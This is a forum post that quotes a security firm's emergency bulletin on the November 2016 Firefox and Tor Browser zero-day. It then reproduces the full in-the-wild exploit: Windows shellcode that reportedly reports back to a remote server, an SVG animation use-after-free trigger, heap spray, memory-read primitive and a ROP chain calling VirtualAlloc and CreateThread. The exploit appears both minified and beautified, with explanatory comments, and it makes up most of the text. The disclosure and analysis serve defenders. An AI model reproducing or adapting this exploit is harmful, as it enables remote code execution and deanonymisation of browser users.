  1. #1
    Registered since
    15.11.2007
    Posts
    3,200
    Blog entries
    2



    [Law] Firefox security vulnerability Tor browser bundle Javascript exploit

    Emergency Bulletin: Firefox 0 day in the wild. What to do.

    This entry was posted in General Security on November 30, 2016 by mark 18 Replies

    We're publishing this as an emergency bulletin for our customers and the larger web community. A few hours ago a zero-day vulnerability emerged in the Tor Browser Bundle and the Firefox web browser. Currently it exploits Windows systems with a high success rate and affects Firefox versions 41 to 50 and the current version of the Tor Browser Bundle, which contains Firefox 45 ESR.
    If you use Firefox, we recommend you temporarily switch browsers to Chrome, Safari or another non-Firefox-based browser that is secure until the Firefox dev team can release an update. The vulnerability allows an attacker to execute code on your Windows workstation. The exploit is in the wild, meaning it's now public and every hacker on the planet has access to it. There is no fix at the time of this writing.
    Currently this exploit causes a workstation to report back to an IP address based at OVH in France. But this code can likely be repurposed to infect workstations with malware or ransomware. The exploit code is now public knowledge, so we expect new variants of this attack to emerge rapidly.
    This is a watering hole attack, meaning that a victim has to visit a website that contains this exploit code to be attacked. So our forensic team is keeping an eye on compromised WordPress websites, and we expect to see this code show up on a few of them during the next few days. An attacker's goal would be to compromise the workstations of visitors to WordPress websites that have been hacked.
    How this unfolded

    On Tuesday just after noon Pacific time, someone published a 0 day exploit for Firefox and Tor to the tor browser mailing list.

    Since then researcher Dan Guido posted a series of tweets with some analysis of the exploit itself.

    Twitter user @TheWack0lian noticed the shellcode (code that executes on your Windows workstation once exploited) is very similar to shellcode likely used by the FBI back in 2013 to deanonymize visitors to child porn websites hosted by Freedom Hosting. The FBI confirmed that they compromised that server and days later it was serving malware that would infect site visitor workstations. The code then reported site visitor real IP addresses, MAC addresses (network card hardware address) and Windows computer name to a central server. This code is very similar.

    What we found

    The shellcode in this attack calls back to IP address 5.39.27.226, which was a web server hosted at OVH in France. The site is now down. Our own research shows that if you look up this IP address in Shodan, it had an SSL certificate that is a wildcard for the energycdn.com domain name. That site for energycdn is simplistic and according to archive.org, it has not changed since 2014.
    Googling energycdn.com shows that the domain is used frequently to host pirated content. Norton Safe Web reports it hosts viruses. Google Safe Browsing transparency report says the domain hosts malware and redirects to malicious sites.
    One could speculate that the server at 5.39.27.226 was used by energycdn.com as one of their servers to host pirated content. Perhaps the server was compromised by whoever controls energycdn to host that content and then was reinfected by the perpetrator of this new malware variant. But we’re speculating.

    [tor-talk] Javascript exploit

    firstwatch at sigaint.org
    Tue Nov 29 21:55:23 UTC 2016


    This is a JavaScript exploit actively used against TorBrowser NOW. It consists of one HTML and one CSS file, both pasted below and also de-obscured. The exact functionality is unknown but it's getting access to "VirtualAlloc" in "kernel32.dll" and goes from there. Please fix ASAP. I had to break the "thecode" line in two in order to post, remove ' + ' in the middle to restore it.

    HTML:

    <html>
    <head>
    <script>

    var thecode
    ='\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30\u0c52\u528b\u8b14\u2872\ub70f\u264a\uff31\uc031\u3cac\u7c61\u2c02\uc120\u0dcf\uc701\uf0e2\u5752\u528b\u8b10\u3c42\ud001\u408b\u8578\u74c0\u014a\u50d0\u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b34\ud601\uff31\uc031\uc1ac\u0dcf\uc701\ue038\uf475\u7d03\u3bf8\u247d\ue275\u8b58\u2458\ud301\u8b66\u4b0c\u588b\u011c\u8bd3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u515a\ue0ff\u5f58\u8b5a\ueb12\u5d86\u858d\u0297\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u0185\u0000\u858d\u029e\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u8029\u006b\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050\u5050\u5040\u5040\uea68\udf0f\uffe0\u31d5\uf7db\u39d3\u0fc3\u3a84\u0001\u8900\u68c3\u2705\ue21b\u6866\u5000\uc931\uc180\u6602\u8951\u6ae2\u5210\u6853\ua599\u6174\ud5ff\uc085\u0874\u8dfe\u0248\u0000\ud775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\ude49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6\u0000\ue857\u00fa\u0000\u895e\u8dca\ua7bd\u0002\ue800\u00ec\u0000\u834f\u20fa\u057c\u20ba\u0000\u8900\u56d1\ua4f3\u0db9\u0000\u8d00\u8ab5\u0002\uf300\u89a4\u44bd\u0002\u5e00\u6856\u28a9\u8034\ud5ff\uc085\u840f'
    +
    '\u00ae\u0000\u8b66\u0a48\u8366\u04f9\u820f\u00a0\u0000\u408d\u8b0c\u8b00\u8b08\ub809\u0100\u0000\u8950\u29e7\u89c4\u57e6\u5156\u6851\u7248\ub8d2\ud5ff\uc085\uc481\u0104\u0000\ub70f\u830f\u06f9\u7072\u06b9\u0000\ub800\u0010\u0000\uc429\ue789\uca89\ue2d1\u5250\ud231\u168a\ud088\uf024\ue8c0\u3c04\u7709\u0404\ueb30\u0402\u8837\u4707\ud088\u0f24\u093c\u0477\u3004\u02eb\u3704\u0788\u4647\ud4e2\u2959\u89cf\u58fe\uc401\ubd8b\u0244\u0000\ua4f3\u36e8\u0000\u3100\u50c0\u2951\u4fcf\u5357\uc268\u38eb\uff5f\uebd5\u6a09\u6800\u1347\u6f72\ud5ff\u6853\u6e75\u614d\ud5ff\uedeb\uc931\ud1f7\uc031\uaef2\ud1f7\uc349\u0000\u0000\u8d03\ua7bd\u0002\ue800\uffe4\uffff\ub94f\u004f\u0000\ub58d\u026e\u0000\ua4f3\ubd8d\u02a7\u0000\ucbe8\uffff\uc3ff\u0a0d\u6341\u6563\u7470\u452d\u636e\u646f\u6e69\u3a67\u6720\u697a\u0d70\u0d0a\u000a\u0a0d\u6f43\u6b6f\u6569\u203a\u434d\u773d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u4700\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\u3063\u3132\u2032\u5448\u5054\u312f\u312e\u0a0d\u6f48\u7473\u203a\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u4190';


    // The worker (cssbanner.js) receives the shellcode, builds the heap spray and
    // the memory-read primitive, and posts the spray base address back.
    var worker = new Worker('cssbanner.js');

    worker.postMessage(thecode);

    var svgns = 'http://www.w3.org/2000/svg';
    var heap80 = new Array(0x1000);
    var heap100 = new Array(0x4000);
    var block80 = new ArrayBuffer(0x80);
    var block100 = new ArrayBuffer(0x100);
    var sprayBase = undefined;
    var arrBase = undefined;

    var animateX = undefined;
    var containerA = undefined;

    var offset = 0x90;
    if (/.*Firefox\/(4[7-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent))
    {
    offset = 0x88; // versions 47.0 or greater
    }

    var $ = function(id) { return document.getElementById(id); }

    // Trigger. block80 is the replacement object: three of its dwords point at
    // the worker's spray (arrBase - offset; the offset depends on the Firefox
    // version, see above). Re-setting 'begin' on animateX and then pausing the
    // container hits the use-after-free in SVG animation timing (CVE-2016-9079);
    // the ArrayBuffer.slice() loops around it refill the freed 0x80-byte slot
    // with a copy of block80 so the stale pointer lands on attacker data.
    var exploit = function()
    {
    var u32 = new Uint32Array(block80)
    u32[0x2] = arrBase - offset;
    u32[0x8] = arrBase - offset;
    u32[0xE] = arrBase - offset;

    // heap shaping before the first begin-time change
    for(i = heap100.length/2; i < heap100.length; i++)
    {
    heap100[i] = block100.slice(0)
    }

    for(i = 0; i < heap80.length/2; i++)
    {
    heap80[i] = block80.slice(0)
    }

    animateX.setAttribute('begin', '59s')
    animateX.setAttribute('begin', '58s')

    // fill the hole left by the freed object
    for(i = heap80.length/2; i < heap80.length; i++)
    {
    heap80[i] = block80.slice(0)
    }

    for(i = heap100.length/2; i < heap100.length; i++)
    {
    heap100[i] = block100.slice(0)
    }

    animateX.setAttribute('begin', '10s')
    animateX.setAttribute('begin', '9s')
    window.dump('PAUSING!!! YAYA');
    containerA.pauseAnimations(); // use of the freed object
    }

    // The first message from the worker carries the spray base (arrBase) and
    // starts the trigger; the second ("GREAT SUCCESS") means the ROP chain is in
    // place, after which the worker is stopped and the page wiped a second later.
    worker.onmessage = function(e)
    {
    worker.onmessage = function(e)
    {
    window.setTimeout(function()
    {
    worker.terminate();

    document.body.innerHTML = '';
    document.getElementsByTagName('head')[0].innerHTML = '';
    document.body.setAttribute('onload', '')
    }, 1000);
    }

    arrBase = e.data;
    exploit();
    }


    var idGenerator = function()
    {
    return 'id' +
    (((1+Math.random())*0x10000)|0).toString(16).substring(1);
    }


    // Two SVG containers with four <animate> elements whose begin/end times refer
    // to one another (idC.end, idA.end), so changing animateX's begin time
    // re-schedules the others inside the same time container.
    var craftDOM = function()
    {
    containerA = document.createElementNS(svgns, 'svg')
    var containerB = document.createElementNS(svgns, 'svg');

    animateX = document.createElementNS(svgns, 'animate')
    var animateA = document.createElementNS(svgns, 'animate')
    var animateB = document.createElementNS(svgns, 'animate')

    var animateC = document.createElementNS(svgns, 'animate')

    var idX = idGenerator();
    var idA = idGenerator();
    var idB = idGenerator();
    var idC = idGenerator();

    animateX.setAttribute('id', idX);
    animateA.setAttribute('id', idA);
    animateA.setAttribute('end', '50s');
    animateB.setAttribute('id', idB);
    animateB.setAttribute('begin', '60s');
    animateB.setAttribute('end', idC + '.end');
    animateC.setAttribute('id', idC);
    animateC.setAttribute('begin', '10s');
    animateC.setAttribute('end', idA + '.end');

    containerA.appendChild(animateX)
    containerA.appendChild(animateA)
    containerA.appendChild(animateB)

    containerB.appendChild(animateC)

    document.body.appendChild(containerA);
    document.body.appendChild(containerB);
    }
    window.onload = craftDOM;
    //
    </script>

    <style>
    #mtdiv{
    position: absolute;
    width: 960px;
    height: 166px;
    z-index: 15;
    top: 100px;
    left: 50%;
    margin: 0 0 0 -480px;
    }
    </style>
    </head>
    <body bgcolor='#2F3236'>

    <div id='mtdiv'>
    <img src='mt.png'/>
    </div>
    </body>
    <script>
    setTimeout('window.location = \'member.php\';', 2000);
    </script>

    </html>

    ===================================================================================================

    content of "cssbanner.js":

    self.onmessage = function(msg) {

    thecode = msg.data;
    var pack = function (b) { var a = b >> 16; return String.fromCharCode(b & 65535) + String.fromCharCode(a) };
    function Memory(b,a,f){this._base_addr=b;this._read=a;this._write=f;this._abs_read=function(a){a>=this._base_addr?a=this._read(a-this._base_addr):(a=4294967295-this._base_addr+1+a,a=this._read(a));return 0>a?4294967295+a+1:a};this._abs_write=function(a,b){a>=this._base_addr?this._write(a-this._base_addr,b):(a=4294967295-this._base_addr+1+a,this._write(a,b))};this.readByte=function(a){return this.read(a)&255};this.readWord=function(a){return this.read(a)&65535};this.readDword=function(a){return this.read(a)};
    this.read=function(a,b){if(a%4){var c=this._abs_read(a&4294967292),d=this._abs_read(a+4&4294967292),e=a%4;return c>>>8*e|d<<8*(4-e)}return this._abs_read(a)};this.readStr=function(a){for(var b="",c=0;;){if(32==c)return"";var d=this.readByte(a+c);if(0==d)break;b+=String.fromCharCode(d);c++}return b};this.write=function(a){}}
    function PE(b,a){this.mem=b;this.export_table=this.module_base=void 0;this.export_table_size=0;this.import_table=void 0;this.import_table_size=0;this.find_module_base=function(a){for(a&=4294901760;a;){if(23117==this.mem.readWord(a))return this.module_base=a;a-=65536}};this._resolve_pe_structures=function(){peFile=this.module_base+this.mem.readWord(this.module_base+60);if(17744!=this.mem.readDword(peFile))throw"Bad NT Signature";this.pe_file=peFile;this.optional_header=this.pe_file+36;this.export_directory=this.module_base+this.mem.readDword(this.pe_file+120);this.export_directory_size=this.mem.readDword(this.pe_file+124);this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);this.import_directory_size=this.mem.readDword(this.pe_file+132)};this.resolve_imported_function=function(a,b){void 0==this.import_directory&&this._resolve_pe_structures();for(var e=this.import_directory,c=e+this.import_directory_size;e<c;){var d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);if(a.toUpperCase()==d.toUpperCase()){for(var c=this.mem.readDword(e)+this.module_base,e=this.mem.readDword(e+16)+this.module_base,d=this.mem.readDword(c),f=0;0!=d;){if(this.mem.readStr(d+this.module_base+2).toUpperCase()==b.toUpperCase())return this.mem.readDword(e+4*f);f++;d=this.mem.readDword(c+4*f)}break}e+=20}return 0};void 0!=a&&this.find_module_base(a)}
    function ROP(b,a){this.mem=b;this.pe=new PE(b,a);this.pe._resolve_pe_structures();this.module_base=this.pe.module_base+4096;this.findSequence=function(a){for(var b=0;;){for(var e=0,c=0;c<a.length;c++)if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c)e++;else break;if(e==a.length)return this.module_base+b;b++}};this.findStackPivot=function(){return this.findSequence([148,195])};this.findPopRet=function(a){return this.findSequence([88,195])};this.ropChain=function(a,b,e,c){c=void 0!=c?c:new ArrayBuffer(4096);
    c=new Uint32Array(c);var d=this.findStackPivot(),f=this.findPopRet("EAX"),g=this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");c[0]=f+1;c[1]=f;c[2]=a+b+4*e+4;c[3]=d;for(i=0;i<e;i++)c[(b>>2)+i]=d;d=(b+4>>2)+e;c[d++]=g;c[d++]=a+(b+4*e+28);c[d++]=a;c[d++]=4096;c[d++]=4096;c[d++]=64;c[d++]=3435973836;return c}}
    var conv=new ArrayBuffer(8),convf64=new Float64Array(conv),convu32=new Uint32Array(conv),qword2Double=function(b,a){convu32[0]=b;convu32[1]=a;return convf64[0]},doubleFromFloat=function(b,a){convf64[0]=b;return convu32[a]},sprayArrays=function(){for(var b=Array(262138),a=0;262138>a;a++)b[a]=fzero;for(a=0;a<b.length;a+=512)b[a+1]=memory,b[a+21]=qword2Double(0,2),b[a+14]=qword2Double(arrBase+o1,0),b[a+(o1+8)/8]=qword2Double(arrBase+o2,0),b[a+(o2+0)/8]=qword2Double(2,0),b[a+(o2+8)/8]=qword2Double(arrBase+o3,arrBase+13),b[a+(o3+0)/8]=qword2Double(16,0),b[a+(o3+24)/8]=qword2Double(2,0),b[a+(o3+32)/8]=qword2Double(arrBase+o5,arrBase+o4),b[a+(o4+0)/8]=qword2Double(0,arrBase+o6),b[a+(o5+0)/8]=qword2Double(arrBase+o7,0),b[a+(o6+8)/8]=qword2Double(2,0),b[a+(o7+8)/8]=qword2Double(arrBase+o7+16,0),b[a+(o7+16)/8]=qword2Double(0,4026531840),b[a+(o7+32)/8]=qword2Double(0,3220176896),b[a+(o7+48)/8]=qword2Double(2,0),b[a+(o7+56)/8]=qword2Double(1,0),b[a+(o7+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o7+112)/8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+(o7+168)/8]=qword2Double(0,2),b[a+(o9+0)/8]=qword2Double(arrBase+o10,2),b[a+(o10+0)/8]=qword2Double(2,0),b[a+(o10+8)/8]=qword2Double(0,268435456),b[a+(o11+8)/8]=qword2Double(arrBase+o11+16,0),b[a+(o11+16)/8]=qword2Double(0,4026531840),b[a+(o11+32)/8]=qword2Double(0,3220176896),b[a+(o11+48)/8]=qword2Double(2,0),b[a+(o11+56)/8]=qword2Double(1,0),b[a+(o11+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o11+112)/8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+(o11+168)/8]=qword2Double(0,2);for(a=0;a<spr.length;a++)spr[a]=b.slice(0)},vtable_offset=300;/.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)?vtable_offset=304:/.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)&&(vtable_offset=308);
    var spr=Array(400),arrBase=805306416,ropArrBuf=new ArrayBuffer(4096),o1=176,o2=256,o3=768,o4=832,o5=864,o6=928,o7=1024,o8=1280,o9=1344,o10=1376,o11=1536,oRop=1792,memory=new Uint32Array(16),len=memory.length,arr_index=0,arr_offset=0;fzero=qword2Double(0,0);0!=thecode.length%2&&(thecode+="\u9090");sprayArrays();postMessage(arrBase);
    for(memarrayloc=void 0;void 0==memarrayloc;)for(i=0;i<spr.length;i++)for(offset=0;offset<spr[i].length;offset+=512)if("object"!=typeof spr[i][offset+1]){memarrayloc=doubleFromFloat(spr[i][offset+1],0);arr_index=i;arr_offset=offset;spr[i][offset+(o2+0)/8]=qword2Double(65,0);spr[i][offset+(o2+8)/8]=qword2Double(arrBase+o3,memarrayloc+27);for(j=0;33>j;j++)spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27);spr[i][offset+(o3+8)/8]=qword2Double(0,0);spr[i][offset+(o5+0)/8]=qword2Double(arrBase+o11,0);spr[i][offset+(o7+168)/8]=qword2Double(0,3);spr[i][offset+(o7+88)/8]=qword2Double(0,2);break}for(;memory.length==len;);var mem=new Memory(memarrayloc+48,function(b){return memory[b/4]},function(b,a){memory[b/4]=a}),xulPtr=mem.readDword(memarrayloc+12);spr[arr_index][arr_offset+1]=ropArrBuf;ropPtr=mem.readDword(arrBase+8);spr[arr_index][arr_offset+1]=null;ropBase=mem.readDword(ropPtr+16);var rop=new ROP(mem,xulPtr);rop.ropChain(ropBase,vtable_offset,10,ropArrBuf);
    var backupESP=rop.findSequence([137,1,195]),ropChain=new Uint32Array(ropArrBuf);ropChain[0]=backupESP;CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread");for(var i=0;i<ropChain.length&&3435973836!=ropChain[i];i++);ropChain[i++]=3296825488;ropChain[i++]=2048;ropChain[i++]=1347469361;ropChain[i++]=1528949584;ropChain[i++]=3092271187;ropChain[i++]=CreateThread;ropChain[i++]=3096498431;ropChain[i++]=arrBase+16;ropChain[i++]=1955274891;ropChain[i++]=280697892;ropChain[i++]=704643071;ropChain[i++]=2425406428;ropChain[i++]=4294957800;ropChain[i++]=2425393407;for(var j=0;j<thecode.length;j+=2)ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeAt(j+1);spr[arr_index][arr_offset]=qword2Double(arrBase+16,0);spr[arr_index][arr_offset+3]=qword2Double(0,256);spr[arr_index][arr_offset+2]=qword2Double(ropBase,0);spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3);spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2);postMessage("GREAT SUCCESS");

    };


    Beautified:

    self.onmessage =
    function(msg) {

    thecode = msg.data;
    var pack = function (b) { var a = b >> 16; return String.fromCharCode(b
    & 65535) + String.fromCharCode(a) };

    // Read primitive over the corrupted `memory` Uint32Array: `b` is the address
    // that element 0 now corresponds to, `a`/`f` read and write a dword at a byte
    // offset. Addresses below the base wrap modulo 2^32, so the whole 32-bit
    // address space is reachable.
    function Memory(b,a,f)
    {
    this._base_addr=b;
    this._read=a;
    this._write=f;
    this._abs_read = function(a) {
    a >= this._base_addr ? a = this._read( a - this._base_addr) : (
    a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) );
    return 0>a?4294967295+a+1:a

    };
    this._abs_write = function(a,b) {
    a >= this._base_addr ? this._write(a - this._base_addr, b) : ( a
    = 4294967295 - this._base_addr + 1 + a, this._write(a,b) )
    };
    this.readByte = function(a) {
    return this.read(a) & 255

    };
    this.readWord = function(a) {
    return this.read(a) & 65535
    };
    this.readDword = function(a){ return this.read(a) };
    this.read = function(a,b) {
    if (a%4) {
    var c = this._abs_read( a & 4294967292),
    d = this._abs_read( a+4 & 4294967292),
    e = a%4;
    return c>>>8*e | d<<8*(4-e)
    }
    return this._abs_read(a)
    };
    this.readStr = function(a) {
    for(var b = "", c = 0;;) {
    if (32 == c)
    return "";
    var d = this.readByte(a+c);
    if(0 == d)
    break;
    b += String.fromCharCode(d);
    c++
    }
    return b

    };
    this.write = function(a){}
    }
    // Minimal PE parser on top of the read primitive. find_module_base walks down
    // from an address in 64 KiB steps until it hits an 'MZ' header (23117 = 0x5A4D,
    // 17744 = 'PE\0\0'); resolve_imported_function then scans the import
    // directory (20-byte descriptors) for a DLL name and returns the IAT entry
    // of the requested function.
    function PE(b,a) {
    this.mem = b;
    this.export_table = this.module_base = void 0;
    this.export_table_size = 0;
    this.import_table = void 0;
    this.import_table_size = 0;
    this.find_module_base = function(a) {
    for(a &= 4294901760; a; ) {
    if(23117 == this.mem.readWord(a))
    return this.module_base=a;
    a -= 65536
    }
    };
    this._resolve_pe_structures = function() {
    peFile = this.module_base + this.mem.readWord(this.module_base+60);
    if(17744 != this.mem.readDword(peFile))
    throw"Bad NT Signature";
    this.pe_file = peFile;
    this.optional_header = this.pe_file+36;
    this.export_directory = this.module_base+this.mem.readDword(this.pe_file+120);
    this.export_directory_size = this.mem.readDword(this.pe_file+124);
    this.import_directory = this.module_base+this.mem.readDword(this.pe_file+128);
    this.import_directory_size = this.mem.readDword(this.pe_file+132)};
    this.resolve_imported_function=function(a,b){
    void 0==this.import_directory&&this._resolve_pe_structures();
    for(var e=this.import_directory,c=e+this.import_directory_size;e<c;){
    var d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);
    if(a.toUpperCase()==d.toUpperCase()){
    for(var c = this.mem.readDword(e) + this.module_base,
    e = this.mem.readDword(e+16) +
    this.module_base,
    d = this.mem.readDword(c),
    f = 0 ; 0 !=d ;)
    {
    if(this.mem.readStr(d+this.module_base+2).toUpperCase()
    == b.toUpperCase())
    return this.mem.readDword(e+4*f);
    f++;
    d = this.mem.readDword(c+4*f)
    }
    break
    }
    e+=20
    }
    return 0
    };
    void 0!=a && this.find_module_base(a)
    }
    // ROP helpers over the code section (module_base + 0x1000) of the module that
    // xulPtr points into: findSequence is a plain byte-pattern search, the stack
    // pivot is `xchg eax,esp; ret` (0x94 0xC3) and the pop gadget is
    // `pop eax; ret` (0x58 0xC3).
    function ROP(b,a){
    this.mem = b;
    this.pe = new PE(b,a);
    this.pe._resolve_pe_structures();
    this.module_base = this.pe.module_base+4096;
    this.findSequence = function(a) {
    for(var b=0;;) {
    for(var e=0,c=0;c<a.length;c++)
    if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c)
    e++;
    else
    break;
    if(e==a.length)
    return this.module_base+b;
    b++

    }

    };
    this.findStackPivot=function() {
    return this.findSequence([148,195])

    };
    this.findPopRet=function(a) {
    return this.findSequence([88,195])

    };
    // Chain layout in the 4 KiB buffer: the pivot gadget fills the vtable slots
    // at offset `b`, then VirtualAlloc(a, 0x1000, MEM_COMMIT = 4096,
    // PAGE_EXECUTE_READWRITE = 64) is called on the buffer itself; 0xCCCCCCCC
    // (3435973836) marks where the caller appends the next stage.
    this.ropChain=function(a,b,e,c) {
    c = void 0 != c ? c : new ArrayBuffer(4096);
    c = new Uint32Array(c);
    var d = this.findStackPivot(),
    f = this.findPopRet("EAX"),
    g = this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");
    c[0]= f+1;
    c[1]= f;
    c[2]= a+b+4*e+4;
    c[3]= d;
    for(i=0;i<e;i++)
    c[(b>>2)+i] = d;
    d =(b+4>>2)+e;
    c[d++]=g;
    c[d++]=a+(b+4*e+28);
    c[d++]=a;
    c[d++]=4096;
    c[d++]=4096;
    c[d++]=64;
    c[d++]=3435973836;
    return c
    }
    }
    var conv=new ArrayBuffer(8),
    convf64=new Float64Array(conv),
    convu32=new Uint32Array(conv),
    qword2Double=function(b,a) {
    convu32[0]=b;
    convu32[1]=a;
    return convf64[0]
    },
    doubleFromFloat = function(b,a) {
    convf64[0]=b;
    return convu32[a]

    },
    // Heap spray from the worker: 400 copies of a ~2 MiB double array. Every
    // 4 KiB slot (512 doubles) holds a fake object graph whose pointers assume
    // the spray lands at arrBase (0x30000010), with the `memory` reference stored
    // at slot+1 so the slot the UAF hits can be found and corrupted later.
    sprayArrays=function() {
    for(var b=Array(262138),a=0;262138>a;a++)
    b[a]=fzero;
    for(a=0;a<b.length;a+=512)
    b[a+1] = memory,
    b[a+21] = qword2Double(0,2),
    b[a+14] = qword2Double(arrBase+o1,0),
    b[a+(o1+8)/8] = qword2Double(arrBase+o2,0),
    b[a+(o2+0)/8] = qword2Double(2,0),
    b[a+(o2+8)/8] = qword2Double(arrBase+o3,arrBase+13),
    b[a+(o3+0)/8] = qword2Double(16,0),
    b[a+(o3+24)/8] = qword2Double(2,0),
    b[a+(o3+32)/8] = qword2Double(arrBase+o5,arrBase+o4),
    b[a+(o4+0)/8] = qword2Double(0,arrBase+o6),
    b[a+(o5+0)/8] = qword2Double(arrBase+o7,0),
    b[a+(o6+8)/8] = qword2Double(2,0),
    b[a+(o7+8)/8] = qword2Double(arrBase+o7+16,0),
    b[a+(o7+16)/8] = qword2Double(0,4026531840),
    b[a+(o7+32)/8] = qword2Double(0,3220176896),
    b[a+(o7+48)/8] = qword2Double(2,0),
    b[a+(o7+56)/8] = qword2Double(1,0),
    b[a+(o7+96)/8] = qword2Double(arrBase+o8,arrBase+o8),
    b[a+(o7+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16),
    b[a+(o7+168)/8] = qword2Double(0,2),
    b[a+(o9+0)/8] = qword2Double(arrBase+o10,2),
    b[a+(o10+0)/8] = qword2Double(2,0),
    b[a+(o10+8)/8] = qword2Double(0,268435456),
    b[a+(o11+8)/8] = qword2Double(arrBase+o11+16,0),
    b[a+(o11+16)/8] = qword2Double(0,4026531840),
    b[a+(o11+32)/8] = qword2Double(0,3220176896),
    b[a+(o11+48)/8] = qword2Double(2,0),
    b[a+(o11+56)/8] = qword2Double(1,0),
    b[a+(o11+96)/8] = qword2Double(arrBase+o8,arrBase+o8),
    b[a+(o11+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16),
    b[a+(o11+168)/8] = qword2Double(0,2);
    for(a=0;a<spr.length;a++)
    spr[a]=b.slice(0)
    }, vtable_offset=300;
    // Version-dependent offset of the virtual-call slot the freed object's caller
    // uses; the chain places the stack pivot there (41.0.x/42.0: 304, 43 and
    // later: 308, otherwise 300).
    /.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)?
    vtable_offset=304 :
    /.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)
    && (vtable_offset=308);
    var spr=Array(400),
    arrBase=805306416,
    ropArrBuf=new ArrayBuffer(4096),
    o1=176,
    o2=256,
    o3=768,
    o4=832,
    o5=864,
    o6=928,
    o7=1024,
    o8=1280,
    o9=1344,
    o10=1376,
    o11=1536,
    oRop=1792,
    memory=new Uint32Array(16),
    len=memory.length,
    arr_index=0,
    arr_offset=0;
    fzero=qword2Double(0,0);
    0!=thecode.length%2&&(thecode+="\u9090");
    sprayArrays();
    postMessage(arrBase);
    // Wait for the main thread's UAF to hit one spray slot: the slot whose
    // `memory` reference is no longer an object now holds an address instead.
    // Record it, then rewrite the fake object's fields around that address so
    // that `memory` itself gets corrupted (its length stops being 16).
    for(memarrayloc=void 0;void 0==memarrayloc;)
    for(i=0;i<spr.length;i++)
    for(offset=0;offset<spr[i].length;offset+=512)
    if("object" != typeof spr[i][offset+1]) {
    memarrayloc=doubleFromFloat(spr[i][offset+1],0);
    arr_index=i;
    arr_offset=offset;
    spr[i][offset+(o2+0)/8]=qword2Double(65,0);
    spr[i][offset+(o2+8)/8]=qword2Double(arrBase+o3,memarrayloc+27);
    for(j=0;33>j;j++)
    spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27);
    spr[i][offset+(o3+8)/8]=qword2Double(0,0);
    spr[i][offset+(o5+0)/8]=qword2Double(arrBase+o11,0);
    spr[i][offset+(o7+168)/8]=qword2Double(0,3);
    spr[i][offset+(o7+88)/8]=qword2Double(0,2);
    break
    }
    // Spin until the corruption lands, then build the read primitive on top of
    // `memory` (element 0 now corresponds to address memarrayloc+48).
    for(;memory.length==len;);
    var mem=new Memory(memarrayloc+48,
    function(b){return memory[b/4]},
    function(b,a){memory[b/4]=a}),
    xulPtr=mem.readDword(memarrayloc+12);
    spr[arr_index][arr_offset+1]=ropArrBuf;
    ropPtr=mem.readDword(arrBase+8);
    spr[arr_index][arr_offset+1]=null;
    ropBase=mem.readDword(ropPtr+16);
    var rop=new ROP(mem,xulPtr);
    rop.ropChain(ropBase,vtable_offset,10,ropArrBuf);
    // Second stage after the VirtualAlloc call: `mov [ecx],eax; ret`
    // (0x89 0x01 0xC3) saves ESP, then the raw dwords below are hand-assembled
    // x86 (nop; add esp,0x800; xor eax,eax; push eax; ...) that ends in a
    // CreateThread call on the shellcode copied in after the 0xCCCCCCCC marker.
    var backupESP=rop.findSequence([137,1,195]), ropChain=new
    Uint32Array(ropArrBuf);
    ropChain[0]=backupESP;
    CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread");
    for(var i=0;i<ropChain.length&&3435973836!=ropChain[i];i++);
    ropChain[i++]=3296825488;
    ropChain[i++]=2048;
    ropChain[i++]=1347469361;
    ropChain[i++]=1528949584;
    ropChain[i++]=3092271187;
    ropChain[i++]=CreateThread;
    ropChain[i++]=3096498431;
    ropChain[i++]=arrBase+16;
    ropChain[i++]=1955274891;
    ropChain[i++]=280697892;
    ropChain[i++]=704643071;
    ropChain[i++]=2425406428;
    ropChain[i++]=4294957800;
    ropChain[i++]=2425393407;
    // Append the shellcode, two UTF-16 code units per little-endian dword.
    for (var j=0;j<thecode.length;j+=2)
    ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeAt(j+1);
    // Point the fake object's vtable at the chain and re-arm the trigger fields;
    // the main thread's pauseAnimations() then makes the virtual call.
    spr[arr_index][arr_offset]=qword2Double(arrBase+16,0);
    spr[arr_index][arr_offset+3]=qword2Double(0,256);
    spr[arr_index][arr_offset+2]=qword2Double(ropBase,0);
    spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3);
